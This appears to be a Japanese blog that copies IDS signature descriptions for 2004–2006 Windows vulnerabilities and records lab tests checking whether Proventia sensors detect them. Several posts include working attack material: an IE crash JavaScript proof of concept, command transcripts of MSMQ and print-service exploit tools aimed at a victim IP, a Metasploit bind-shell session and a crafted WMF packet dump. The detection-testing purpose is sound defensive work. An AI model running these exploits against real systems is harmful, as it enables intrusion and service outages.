つぶやき

このブログは,ご覧頂いたあなたのコンピュータが犯罪に利用されていないか?確認していただく為のひとつの手段としてご利用頂ければ幸いです。電子メール:amaterasu@job.email.ne.jp


テーマ:

Microsoft Windows Enhanced Metafile (EMF) buffer overflow (Image_EMF_Long_Description)

About this signature or vulnerability

Proventia G-Series, Proventia Network IPS, Proventia Desktop, Proventia M-Series, BlackICE Server Protection, Proventia Server for Windows, BlackICE PC Protection, BlackICE Agent for Server, RealSecure Network Sensor, RealSecure Server Sensor:

Trigger if the description field in an Enhanced Metafile (emf) exceeds pam.content.emf.description.threshold which defaults to 128 bytes



Default risk level

High

Sensors that have this signature

Proventia G-Series: XPU 24.38, Proventia Network IPS: XPU 1.77, Proventia Desktop: 8.0.812.1770, Proventia M-Series: XPU 1.77, BlackICE Server Protection: 3.6.cpi, Proventia Server for Windows: 1.0.914.1770, BlackICE PC Protection: 3.6cpi, BlackICE Agent for Server: 3.6epi, RealSecure Network Sensor: XPU 24.38, RealSecure Server Sensor: XPU 24.38

Systems affected

Windows NT: 4.0 Server SP6a, Windows XP: 64-bit Edition SP1, Windows 2000: SP4, Windows Server 2003: Any version, Windows 2000: SP3, Windows XP: SP1, Windows NT: 4.0 Server TSE SP6, Windows XP: 64-bit Edition 2003, Windows Server 2003: 64-Bit Edition, Windows: 98 Second Edition, Windows: XP, Windows: Me, Windows: 98

Type

Unauthorized Access Attempt

Vulnerability description

Multiple versions of Microsoft Windows are vulnerable to a buffer overflow, caused by improper bounds checking when handling Enhanced Metafile (EMF) image formats. By creating a specially-crafted EMF image file containing malicious script, a remote attacker could overflow a buffer and execute arbitrary code on the system with privileges of the victim, once the file is opened. An attacker could exploit this vulnerability by hosting the malicious file on a Web site or by sending it to a victim as an HTML email.

Note: This vulnerability is different than the vulnerability addressed in Microsoft Bulletin MS04-011.

How to remove this vulnerability

Apply the appropriate patch for your system, as listed in Microsoft Security Bulletin MS04-032. See References.

For Windows Server 2003:
Apply the appropriate patch for your system, as listed in Microsoft Security Bulletin MS05-018. See References.

Microsoft originally provided a patch for this vulnerability in MS04-032, but it was superceded by the patch released with MS05-018.


References

Microsoft Security Bulletin MS04-032
Security Update for Microsoft Windows (840987)
http://www.microsoft.com/technet/security/bulletin/ms04-032.mspx

CIAC Information Bulletin P-008
Microsoft Security Update for Microsoft Windows (840987)
http://www.ciac.org/ciac/bulletins/p-008.shtml

Packet Storm Web site
HOD-ms04032-emf-expl2.c
http://packetstormsecurity.nl/0410-exploits/HOD-ms04032-emf-expl2.c

Microsoft Security Bulletin MS05-018
Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege and Denial of Service (890859)
http://www.microsoft.com/technet/security/bulletin/MS05-018.mspx

ISS X-Force
Microsoft Windows Enhanced Metafile (EMF) buffer overflow
http://www.iss.net/security_center/static/16581.php

CVE
CVE-2004-0209
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0209



■検知

Date/Time 2006-06-19 06:15:54 JST
Tag Name Image_EMF_Long_Description
Alert Name Image_EMF_Long_Description
Severity High
Observance Type Intrusion Detection
Combined Event Count 1
Cleared Flag false
Target IP Address 192.168.221.106
Target Object Name 34638
Target Object Type Target Port
Target Service unknown
Source IP Address 192.168.221.110
SourcePort Name 80
Sensor IP Address 10.4.6.106
Sensor Name Proventia_M-Series
:accessed yes
:code 200
:Description Length 65535
:protocol http
:Protocol Name TCP
:server 192.168.221.110
:type attack
:URL /ms04032.wmf
:user-defined false
algorithm-id 2104039
Blocked false
IANAProtocolId 6
Namespace pam
POST Default

AD
いいね!した人  |  リブログ(0)

テーマ:

MSDTC message buffer overflow (MSRPC_MSDTC_Message_GUID_BO)

About this signature or vulnerability

Proventia G-Series, Proventia Desktop, Proventia Network IPS, RealSecure Server Sensor, RealSecure Network Sensor, BlackICE PC Protection, BlackICE Agent for Server, BlackICE Server Protection, Proventia Server for Windows, Proventia M-Series:

This signature looks for a specially-crafted MSRPC MSDTC Request that is used to conduct a buffer overflow.



Default risk level

High

Sensors that have this signature

Proventia G-Series: XPU 24.38, Proventia Desktop: 8.0.812.1770, Proventia Network IPS: XPU 1.77, RealSecure Server Sensor: XPU 24.38, RealSecure Network Sensor: XPU 24.38, BlackICE PC Protection: 3.6cpi, BlackICE Agent for Server: 3.6epi, BlackICE Server Protection: 3.6.cpi, Proventia Server for Windows: 1.0.914.1770, Proventia M-Series: XPU 1.77

Systems affected

Windows 2000: SP4, Windows XP: SP1, Windows Server: 2003, Windows Server 2003: SP1 Itanium, CallPilot: Any Version, Windows Server 2003: Itanium

Type

Unauthorized Access Attempt

Vulnerability description

The Microsoft Distributed Transaction Service Coordinator (MSDTC) could allow a remote attacker to execute arbitrary code on the system, caused by a buffer overflow in the MSDTC. On Windows 2000, a remote attacker could send a specially-crafted network message and execute arbitrary code on the system. On Windows XP SP1 and Windows Server 2003, a local attacker could run a program followed by a specially-crafted application to gain elevated privileges and execute arbitrary code on the system.

Note: On Windows XP SP1, the vulnerability can be exploited remotely if the MSDTC is started. On Windows Server 2003, if support for Network DTC Access has been enabled, the vulnerability can be exploited remotely.

How to remove this vulnerability

Apply the appropriate patch for your system, as listed in Microsoft Security Bulletin MS05-051. See References.

For Windows 2000:
Apply the appropriate patch for your system, as listed in Microsoft Security Bulletin MS06-018. See References.

Note: Microsoft originally provided a patch for this vulnerability in MS05-051, which was superceded by the patch released with MS06-018.

For CallPilot:
Apply the fix as listed in Security Advisory P-2005-0056-Global, available from the Nortel Networks Web site. See References. A login account is required for access.


References

Microsoft Security Bulletin MS05-051
Vulnerabilities in MSDTC and COM+ Could Allow Remote Code Execution (902400)
http://www.microsoft.com/technet/security/bulletin/ms05-051.mspx  

Internet Security Systems Protection Alert October 11, 2005
Multiple Microsoft Vulnerabilities ・October 2005
http://xforce.iss.net/xforce/alerts/id/206  

Security Advisory P-2005-0056-Global
Nortel Networks: Log In Required
http://www.nortel.com/  

Microsoft Security Bulletin MS06-018
Vulnerability in Microsoft Distributed Transaction Coordinator Could Allow Denial of Service (913580)
http://www.microsoft.com/technet/security/Bulletin/MS06-018.mspx  

ISS X-Force
MSDTC message buffer overflow
http://www.iss.net/security_center/static/22467.php  

CVE
CVE-2005-2119
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2119  



■検知

Date/Time 2006-06-18 09:07:52 JST
Tag Name MSRPC_MSDTC_Message_GUID_BO
Alert Name MSRPC_MSDTC_Message_GUID_BO
Severity High
Observance Type Intrusion Detection
Combined Event Count 16
Cleared Flag false
Target IP Address 192.168.37.180
Target Object Name 1025
Target Object Type Target Port
Source IP Address 219.147.22.100
Sensor IP Address 10.4.6.100
Sensor Name network_sensor_1
:end-time 2006-06-18T09:07:32+09:00
:intruder-ip-addr 219.147.22.100
:len 16
:Opnum 0x7
:repeat-count 16
:start-time 2006-06-18T09:06:51+09:00
:victim-ip-addr 192.168.37.180
:victim-port 1025
algorithm-id 2118064
IANAProtocolId 6
Packet DestinationAddress 192.168.37.180
Packet DestinationPort 1025
Packet SourceAddress 219.147.22.100

AD
いいね!した人  |  リブログ(0)

テーマ:


項目

攻撃

リモート

攻撃ポート

80

対象OS

Windows

CVE

MS

PAM

NO-OP large quantity of instructions have been detected (JavaScript_NOOP_Sled)

About this signature or vulnerability

RealSecure Network Sensor, RealSecure Server Sensor:


This signature detects a simple NOOP sled in an 'unescape()' JavaScript function.


Default risk level

High


Sensors that have this signature

RealSecure Network Sensor: XPU 24.32, RealSecure Server Sensor: XPU 24.32


Systems affected

Linux: Any version, Solaris: Any version, HP-UX: Any version, BSD: Any version, IRIX: Any version, OS/2: Any version, DG/UX: Any version, Windows: 95, Windows: 98, Windows NT: 4.0, Windows: 98 Second Edition, SCO Unix: Any version, Windows 2000: Any version, Tru64 UNIX: Any version, Windows: Me, Windows: XP, Mac OS: Any version, AIX: Any version, Windows 2003: Any version


Type

Unauthorized Access Attempt


Vulnerability description

A large quantity of NO-OP instructions has been detected. This may indicate an attempt to overflow a buffer by padding the request with a large number of NO-OP instructions. A successful attempt could cause a denial of service or allow arbitrary code to be executed on the system.


How to remove this vulnerability

Verify that all current patches have been applied and the latest software versions have been installed on the system.



検証環境

優先度

OS

IP

Intruder:

RedHat

192.168.221.110

Victim:

Windows2000

192.168.221.180

センサー

ProvenitaM10

XPU1.70


実証コード

受動的攻撃

影響

メモリー使用率があがります。その後、エラーが発生してIEが強制終了する。

エラー

JavaScript_NOOP_Sled_01

メモリーの使用が増加している様子

JavaScript_NOOP_Sled_02


トレース

イベント一覧

優先度

シグネチャ名

検知件数

High

JavaScript_NOOP_Sled

4


イベント詳細

JavaScript_NOOP_Sled.jpg

参考資料

  • Internet Explorer exploits in the wild (F-Secure blog, 2006.03.27)
  • Updates on IE vulnerability (SANS ISC, 2006.03.27)
  • Malicious Code / Malicious Website: I.E. Zero-day update (Websense, 2006.03.26)
  • Update regarding recent Internet Explorer attacks (MSRC blog, 2006.03.27)
  • AD
    いいね!した人  |  リブログ(0)

    テーマ:

    項目

    攻撃

    リモート

    攻撃ポート

    80

    対象OS

    Windows

    CVE

    CVE-2006-1273

    MS

    PAM

    Microsoft Internet Exporer mshtml.dll buffer overflow (HTML_Mshtml_Overflow)

    About this signature or vulnerability

    RealSecure Network Sensor, RealSecure Server Sensor:


    This signature detects a malicious Web page containing a large number of script action handlers in a single HTML tag.


    Default risk level

    High


    Sensors that have this signature

    RealSecure Network Sensor: XPU 24.32, RealSecure Server Sensor: XPU 24.32


    Systems affected

    Windows XP: SP2, Microsoft Internet Explorer: 6.0


    Type

    Unauthorized Access Attempt


    Vulnerability description

    Microsoft Internet Explorer version 6.0 is vulnerable to a buffer overflow in mshtml.dll. By creating a malicious Web page containing a large number of script action handlers in a single HTML tag, a remote attacker could overflow a buffer and cause Internet Explorer to crash or possibly execute arbitrary code on a victim's system, once the malicious page is opened.


    Note: This vulnerability also affects Mozilla Firefox, and possibly other vendor Web browsers.


    How to remove this vulnerability

    No remedy available as of March 2006.


    検証環境

    優先度

    OS

    IP

    Intruder:

    -

    213.134.128.25

    Victim:

    Windows2000

    192.168.221.180

    センサー

    ProvenitaM10

    XPU1.70


    実証コード

    http://lcamtuf.coredump.cx/iedie.html


    The following proof of concept is available:


    <script>

    for(s='<a onclick=',i=0;i<8||(document.write(s+'>'));i++)s+=s;

    </script>

    Site screenshot:

    HTML_Mshtml_Overflow.png

    Code snippet:

    HTML_Mshtml_Overflow_02.png


    影響

    IEが強制終了する。


    トレース

    イベント一覧

    優先度

    シグネチャ名

    検知件数

    High

    HTML_Mshtml_Overflow

    1




    イベント詳細

    HTML_Mshtml_Overflow.jpg

    いいね!した人  |  リブログ(0)

    テーマ:

    項目

    攻撃

    リモート

    攻撃ポート

    2103

    対象OS

    Windows

    CVE

    CVE-2005-0059

    MS

    MS05-017

    PAM

    Microsoft Windows Message Queuing component buffer overflow (MSRPC_MSMQ_Overflow)

    このシグネチャまたは脆弱点について

    RealSecure Server SensorRealSecure Network Sensor:

    このシグネチャは、Microsoft メッセージ キュー要求のオーバーフローを検出します。


    影響を受けるシステム
    Windows: 98Windows: 98 Second EditionWindows XP: SP1Windows 2000: SP3Windows XP: 64-bit SP1 ItaniumWindows 2000: SP4



    タイプ

    不正アクセスの試み


    脆弱点の説明

    Microsoft Windows 2000 SP3 および SP4Windows XP SP1、および Windows 98 は、メッセージ キュー (MSMQ) コンポーネントの未チェックのバッファによって引き起こされるバッファ オーバーフローに対して脆弱です。 MSMQ コンポーネントがインストールされている場合、リモートの攻撃者は特殊な形式の TCP メッセージを送信することで、バッファをオーバーフローさせ、システム上で任意のコードを実行する可能性があります。 攻撃者がこの脆弱点を悪用してシステムの完全な制御権を得ると、システム上のアカウントを表示、変更、削除、または新規作成することも可能です。


    この脆弱点の解決方法

    Microsoft Security Bulletin を参照して、システムに適切なパッチを適用します。



    検証環境

    優先度

    OS

    IP

    Intruder:

    Windows2000

    192.168.221.11

    Victim:

    Windows2000

    192.168.221.180

    センサー

    ProvenitaM10

    XPU1.66


    実証コード

    C:\tool>ms05017


    。奛奛・(MS05-017) Internal use For ExpLoits.

    。奛奛・Copyright (c) 2005-07-2 . Make By jiaozhu

    。奛奛・www.Jiaozhu.net E-mail:shell@china.com


    ms05017 <host> <port> <netbios name> <bind port> [count]


    MSMQ ports: 2103, 2105, 2107

    count - number of packets. for Win2k Server/AdvServer = 6-8



    C:\tool>ms05017 192.168.221.180 2103 HOD 7777


    。奛奛・(MS05-017) Internal use For ExpLoits.

    。奛奛・Copyright (c) 2005-07-2 . Make By jiaozhu

    。奛奛・www.Jiaozhu.net E-mail:shell@china.com



    [*] Connecting to 192.168.221.180:2103 ... OK

    [*] Attacking.... OK



    トレース

    イベント詳細

    MSRPC_MSMQ_Overflow.jpg


    参照事項

    Vulnerability in MSMQ Could Allow Code Execution (892944)



    ISS X-Force

    Microsoft Windows Message Queuing component buffer overflow

    http://www.iss.net/security_center/static/19829.php


    CVE

    CAN-2005-0059

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0059





















    いいね!した人  |  リブログ(0)

    テーマ:


    項目

    攻撃

    リモート

    攻撃ポート

    対象OS

    Windows

    CVE

    CVE-2006-0005

    MS

    MS06-006

    PAM


    Windows Media Player Plugin EMBED element buffer overflow (HTML_Embed_Overflow)
    このシグネチャまたは脆弱点について
    RealSecure Network Sensor、RealSecure Server Sensor:

    このシグネチャは、リモート バッファ オーバーフローを許可する特殊な形式の HTML「EMBED」ディレクティブを検出します。

    デフォルトの危険度
    高危険度

    このシグネチャが添付されているセンサー
    RealSecure Network Sensor: XPU 24.29 以降、RealSecure Server Sensor: XPU 24.29 以降

    影響を受けるシステム
    Windows Server: 2003、Windows Server 2003: SP1、Windows XP: SP1、Windows XP: SP2、Windows 2000: SP4

    タイプ
    不正アクセスの試み

    脆弱点の説明
    Windows Media Player Plugin は、Microsoft 以外のインターネット ブラウザからさまざまな形式の音楽およびビデオ ファイルを流すために使用されるマルチメディア プレーヤーです。 Microsoft Windows 2000、Windows XP、および Windows Server 2003 対応の Windows Media Player Plugin は、バッファ オーバーフローに対して脆弱です。 リモートの攻撃者は、特殊な形式の EMBED エレメントを含む悪意のある HTML ドキュメントを作成することによってバッファをオーバーフローさせ、被害者の権限を使って被害者のシステム上で任意のコードを実行する可能性があります。 攻撃者は、この悪意のある HTML ドキュメントを Web 上に置き、被害者がそのサイトにアクセスするように仕向けたり、電子メールの添付ファイルとして被害者に送信するなどして、この脆弱点を悪用する可能性があります。

    この脆弱点の解決方法
    Microsoft Security Bulletin MS06-006 を参照して、システムに適したパッチを適用します。

    検証環境

    優先度

    OS

    IP

    Intruder:

    RedHat

    192.168.221.110

    Victim:

    Windows2000

    192.168.221.180

    センサー

    ProvenitaM10

    XPU1.66



    実証コード

    msf wmp_plugin_ms06_006(win32_bind) > show options


    Exploit and Payload Options

    ===========================


    Exploit: Name Default Description

    -------- -------- ------- -------------------------------------------

    required HTTPPORT 8080 The local HTTP listener port

    optional HTTPHOST 0.0.0.0 The local HTTP listener host

    optional REALHOST External address to use for redirects (NAT)


    Payload: Name Default Description

    -------- -------- ------- ------------------------------------------

    required EXITFUNC process Exit technique: "process", "thread", "seh"

    required LPORT 4444 Listening port for bind shell


    Target: Automatic - WMP 9.0


    msf wmp_plugin_ms06_006(win32_bind) > exploit

    [*] Starting Bind Handler.

    [*] Waiting for connections to http://192.168.221.110:8080/

    [*] Targetting WMP v9 on NT/2000...

    [*] HTTP Client connected from 192.168.221.106:30616, sending 699 bytes of payload...

    [*] Targetting WMP v9 on NT/2000...

    [*] HTTP Client connected from 192.168.221.106:30637, sending 699 bytes of payload...

    [*] Exiting Bind Handler.


    レース

    イベント一覧

    優先度

    シグネチャ名

    検知件数

    High

    HTML_Embed_Overflow

    1



    イベント詳細

    HTML_Embed_Overflow.jpg



    コメント

    XPU24.29では、実証コードを実行しても検知していませんでした。しかし、XPU24.30で

    HTML_Embed_Overflow の False Negative が解消され、検知できることを確認しました。

    参考:http://www.isskk.co.jp/support/XPressUpdates/RS/RSNS7X24_30RNj.html


    いいね!した人  |  リブログ(0)

    テーマ:

    項目

    攻撃

    リモート

    攻撃ポート

    80

    対象OS

    Windows

    CVE

    CVE-2005-4560

    MS

    MS06-001

    Microsoft Windows .wmf file code execution (Image_WMF_Generic_RecordSize_Overflow)
    このシグネチャまたは脆弱点について
    RealSecure Network Sensor、RealSecure Server Sensor:

    このシグネチャは、WMF ファイルのレコードサイズをオーバーフローさせようとする試みを検出します。



    デフォルトの危険度
    高危険度



    このシグネチャが添付されているセンサー
    RealSecure Network Sensor: XPU 24.25 以降、RealSecure Server Sensor: XPU 24.25 以降



    影響を受けるシステム
    Windows XP: SP2、Windows XP: SP1、Windows Server: 2003、Windows Server 2003: SP1


    タイプ
    不正アクセスの試み


    脆弱点の説明
    Microsoft Windows XP SP2、XP SP1、Windows Server 2003、および Windows Server 2003 SP1 では、Microsoft Windows Meta File (WMF) のグラフィック レンダリング エンジンにおける脆弱点が原因で、リモートの攻撃者がシステム上で任意のコードを実行する可能性があります。 リモートの攻撃者は、画像を含む特殊な形式の .wmf ファイルを作成し、被害者を してそのファイルを Windows Picture および Fax Viewer で開かせたり、Internet Explorer を使用してプレビューさせたりすることで、システム上で任意のコードを実行する可能性があります。 Internet Explorer が、悪意のある .wmf ファイルを含む Web サイトの閲覧に使用されると、被害者のシステムは自動的に感染する可能性があります。 被害者が悪意のあるファイルのダウンロードまたは実行を選択した場合は、Mozilla Firefox システムも脆弱であることが報告されています。


    この脆弱点の解決方法
    2005 年 12 月現在、対処法は見つかっていません。
    一時的対処法として、信頼されていない .wmf ファイルを開いたりプレビューしたりしないでください。

    詳細

    Microsoft Windows GDI32.DLL WMF image rendering code execution

    http://www.iss.net/security_center/static/23846.php

    実証コード
    先日公開された。MS06-001で対応されていない、新たな脆弱性がWMF2件あると、「cocoruder」と呼ばれる研究者がBugtraqメーリングリストに投稿しています。



    トレース

    Image_WMF_Generic_RecordSize_Overflow.jpg




    No. Time Source Destination Protocol Info

    232 2006-02-04 23:25:00.099999 192.168.221.110 192.168.37.180 HTTP HTTP/1.1 200 OK (text/plain)


    Frame 232 (465 bytes on wire, 465 bytes captured)

    Ethernet II, Src: 00:d0:c9:96:61:5d, Dst: 00:0c:29:91:fb:12

    Internet Protocol, Src Addr: 192.168.221.110 (192.168.221.110), Dst Addr: 192.168.37.180 (192.168.37.180)

    Version: 4

    Header length: 20 bytes

    Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)

    Total Length: 451

    Identification: 0xce42 (52802)

    Flags: 0x04 (Don't Fragment)

    Fragment offset: 0

    Time to live: 63

    Protocol: TCP (0x06)

    Header checksum: 0xe77e (correct)

    Source: 192.168.221.110 (192.168.221.110)

    Destination: 192.168.37.180 (192.168.37.180)

    Transmission Control Protocol, Src Port: http (80), Dst Port: 1048 (1048), Seq: 0, Ack: 0, Len: 411

    Hypertext Transfer Protocol

    Line-based text data: text/plain


    0000 00 0c 29 91 fb 12 00 d0 c9 96 61 5d 08 00 45 00 ..).......a]..E.

    0010 01 c3 ce 42 40 00 3f 06 e7 7e c0 a8 dd 6e c0 a8 ...B@.?..~...n..

    0020 25 b4 00 50 04 18 17 49 ac 86 7a ae ae 38 50 18 %..P...I..z..8P.

    0030 7d 78 d7 b5 00 00 48 54 54 50 2f 31 2e 31 20 32 }x....HTTP/1.1 2

    0040 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 61 74 00 OK..Date: Sat

    0050 2c 20 30 34 20 46 65 62 20 32 30 30 36 20 31 35 , 04 Feb 2006 15

    0060 3a 31 35 3a 35 30 20 47 4d 54 0d 0a 53 65 72 76 :15:50 GMT..Serv

    0070 65 72 3a 20 41 70 61 63 68 65 2f 31 2e 33 2e 31 er: Apache/1.3.1

    0080 32 20 28 55 6e 69 78 29 20 20 28 52 65 64 20 48 2 (Unix) (Red H

    0090 61 74 2f 4c 69 6e 75 78 29 20 6d 6f 64 5f 73 73 at/Linux) mod_ss

    00a0 6c 2f 32 2e 36 2e 36 20 4f 70 65 6e 53 53 4c 2f l/2.6.6 OpenSSL/

    00b0 30 2e 39 2e 35 61 20 6d 6f 64 5f 70 65 72 6c 2f 0.9.5a mod_perl/

    00c0 31 2e 32 34 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 1.24..Last-Modif

    00d0 69 65 64 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e ied: Wed, 11 Jan

    00e0 20 32 30 30 36 20 30 30 3a 31 36 3a 32 36 20 47 2006 00:16:26 G

    00f0 4d 54 0d 0a 45 54 61 67 3a 20 22 32 62 30 65 38 MT..ETag: "2b0e8

    0100 2d 34 34 2d 34 33 63 34 34 65 35 61 22 0d 0a 41 -44-43c44e5a"..A

    0110 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 ccept-Ranges: by

    0120 74 65 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e tes..Content-Len

    0130 67 74 68 3a 20 36 38 0d 0a 4b 65 65 70 2d 41 6c gth: 68..Keep-Al

    0140 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 31 35 2c ive: timeout=15,

    0150 20 6d 61 78 3d 39 35 0d 0a 43 6f 6e 6e 65 63 74 max=95..Connect

    0160 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d ion: Keep-Alive.

    0170 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 .Content-Type: t

    0180 65 78 74 2f 70 6c 61 69 6e 0d 0a 0d 0a 01 00 09 ext/plain.......

    0190 00 00 03 22 00 00 00 01 00 84 43 00 00 00 00 05 ..."......C.....

    01a0 00 00 00 0b 02 8b 03 3f 21 04 00 00 00 ff 00 44 .......?!......D

    01b0 44 44 44 44 44 44 44 44 44 ff ff 33 33 33 33 33 DDDDDDDDD..33333

    01c0 33 33 33 33 33 ff ff 41 42 43 44 03 00 00 00 00 33333..ABCD.....

    01d0 00





    いいね!した人  |  リブログ(0)

    テーマ:

    項目

    攻撃

    リモート

    攻撃ポート

    対象OS

    Windows

    CVE

    CVE-2006-0006

    MS

    MS06-005

    PAM


    Microsoft Windows Media Player BMP image parsing service buffer overflow (Image_BMP_MediaPlayer_Bo)
    このシグネチャまたは脆弱点について
    RealSecure Server Sensor、RealSecure Network Sensor:

    このシグネチャは、Windows Mediaplayer でオーバーフローを引き起こす特殊な形式のビットマップ イメージを検出します。



    デフォルトの危険度
    高危険度

    このシグネチャが添付されているセンサー
    RealSecure Server Sensor: XPU 24.29 以降、RealSecure Network Sensor: XPU 24.29 以降


    影響を受けるシステム
    Windows: Me、Windows Media Player: 7.1、Windows: 98 Second Edition、Windows: 98、Windows 2000: SP4、Windows XP: SP2、Windows XP: SP1、Windows Media Player: 10、Windows Media Player: 9、Windows Server: 2003、Windows Media Player: 8.0

    タイプ
    不正アクセスの試み



    脆弱点の説明
    Microsoft Windows Media Player は、さまざまな形式の音楽やビデオ ファイル用のマルチメディア プレーヤーです。 Windows Media Player バージョン 7.1、8、9、および 10 は、BMP 画像解析サービスの境界が不正なために発生する、バッファ オーバーフローに対して脆弱です。 リモートの攻撃者は悪意のあるビットマップ ファイルを作成し、被害者がそのファイルを開くとバッファをオーバーフローさせ、被害者の権限を使って被害者のシステム上で任意のコードを実行する可能性があります。 攻撃者は、このファイルを Web サイト上に置いたり、電子メールとして被害者に送信するなどして、この脆弱点を悪用する可能性があります。



    この脆弱点の解決方法
    Microsoft Security Bulletin MS06-005 を参照して、システムに適したバッチを適用します。

    詳細

    Microsoft Windows Media Player BMP image parsing service buffer overflow

    http://www.iss.net/security_center/static/24488.php


    検証環境

    優先度

    OS

    IP

    Intruder:

    RedHat

    192.168.221.110

    Victim:

    Windows2000

    192.168.221.180

    センサー

    ProvenitaM10

    XPU1.66


    実証コード

    C:\>ms06005.exe


    Windows Media Player BMP Heap Overflow (MS06-005)

    Bug discovered by eEye

    Exploit coded by ATmaCA

    Web: http://www.spyinstructors.com && http://www.atmacasoft.com

    E-Mail: atmaca@icqmail.com

    Credit to Kozan


    crafted.bmp has been created in the current directory.


    イベント詳細

    ms06005


    いいね!した人  |  リブログ(0)

    テーマ:

    項目

    攻撃

    リモート

    攻撃ポート

    515

    対象OS

    Windows

    CVE

    CVE-2000-0232

    MS

    MS00-021


    Windows TCP/IP Printing Service denial of service (Windows_Printing_Service_DOS)
    このシグネチャまたは脆弱点について
    RealSecure Server Sensor、RealSecure Network Sensor:

    このシグネチャは、一連の不正な要求を印刷サービス ポートに送信することで、パッチが適用されていない NT 4.0 および 2000 システム上の Microsoft Windows TCP/IP サービス (SimpTCP、DHCPServer、FTPSvc、LPDSvc、および BinlSvc を含む) の一部を無効にしようとする試みを検出します。


    デフォルトの危険度
    中危険度



    このシグネチャが添付されているセンサー
    RealSecure Server Sensor: XPU 20.15 以降、RealSecure Network Sensor: XPU 20.14 以降




    影響を受けるシステム
    Windows NT: 4.0 TSE、Windows NT: 4.0、Windows 2000: すべてのバージョン、Windows NT: すべてのバージョン



    タイプ
    サービス不能




    脆弱点の説明
    Windows 2000 では、Unix の印刷サービスがサービス不能攻撃に対して脆弱です。 このサービスは、Windows 2000 および Unix オペレーティング システム間での印刷の統合に使用されます。 リモートからの攻撃者は、不正な印刷要求をポート 515 に送信することで、印刷サービスを他の関連サービスと同様に失敗させる可能性があります。 通常の動作を回復するには、このサービスを再起動する必要があります。



    この脆弱点の解決方法
    Microsoft Security Bulletin MS00-021 を参照して、システムに適したパッチを入手します。


    Windows 2000: すべてのバージョン
    Microsoft Security Bulletin MS01-021 を参照して、「Malformed TCP/IP Print Request」パッチを適用します。
    Windows NT: すべてのバージョン
    Microsoft Security Bulletin MS01-021 を参照して、「Malformed TCP/IP Print Request」パッチを適用します。


    詳細
    Windows TCP/IP Printing Service denial of service
    http://www.iss.net/security_center/static/4203.php


    検証環境

    優先度

    OS

    IP

    Intruder:

    Windows2000

    192.168.221.11

    Victim:

    Windows2000

    192.168.221.180

    検出手段

    ProvenitaM10IPS

    XPU1.66


    実証コード
    C:\Report\Exploite\RS7.0\BufferOverflow>Windows_Printing_Service_DOS_windosprs.exe
    TCP/IP Print Request Server Vulnerability (515 Port) and DHCP Service Denial of Service
    Systems Affected:
    Microsoft Windows NT 4.0 Workstation
    Microsoft Windows NT 4.0 Server
    Microsoft Windows NT 4.0 Server, Enterprise Edition
    Microsoft Windows 2000 Professional
    Microsoft Windows 2000 Server
    Microsoft Windows 2000 Advanced Server

    by: Ussr
    for source code or binary go to: http://www.ussrback.com/

    Usage: windosprs HostIp
    Example: windosprs 192.168.0.6
    C:\Report\Exploite\RS7.0\BufferOverflow>Windows_Printing_Service_DOS_windosprs.exe 192.168.221.180


    トレース

    イベント検知一覧

    優先度

    シグネチャ名

    検知件数

    High

    LPRng_Format_String

    943

    High

    HPUX_LPD_Overflow

    11

    Medium

    Windows_Printing_Service_DOS

    352



    イベント詳細

    Windows_Printing_Service_DOS.jpg


    参照事項

    Microsoft Security Bulletin MS00-021

    Patch Available for "Malformed TCP/IP Print Request" Vulnerability

    http://www.microsoft.com/technet/security/bulletin/ms00-021.asp


    Underground Security Systems Research advisory USSR-2000037

    Remote DoS Attack in Windows 2000/NT 4.0 TCP/IP Print Request Server Vulnerability

    http://www.ussrback.com/labs37.html


    BugTraq Mailing List, Thu Mar 30 2000 - 12:48:09 CST

    Remote DoS Attack in Windows 2000/NT 4.0 TCP/IP Print Request Server Vulnerability

    http://archives.neohapsis.com/archives/bugtraq/2000-03/0306.html


    Microsoft Knowledge Base Article 257870

    Malformed Print Request May Stop Windows 2000 TCP/IP Printing Service

    http://support.microsoft.com/default.aspx?scid=kb;[LN];257870


    Neohapsis Archives

    Remote DoS Attack in Windows 2000/NT 4.0 TCP/IP Print Request Server Vulnerability

    http://archives.neohapsis.com/archives/bugtraq/2000-03/0306.html


    CVE

    CVE-2000-0232

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0232







    概要説明


    いいね!した人  |  リブログ(0)

    AD

    ブログをはじめる

    たくさんの芸能人・有名人が
    書いているAmebaブログを
    無料で簡単にはじめることができます。

    公式トップブロガーへ応募

    多くの方にご紹介したいブログを
    執筆する方を「公式トップブロガー」
    として認定しております。

    芸能人・有名人ブログを開設

    Amebaブログでは、芸能人・有名人ブログを
    ご希望される著名人の方/事務所様を
    随時募集しております。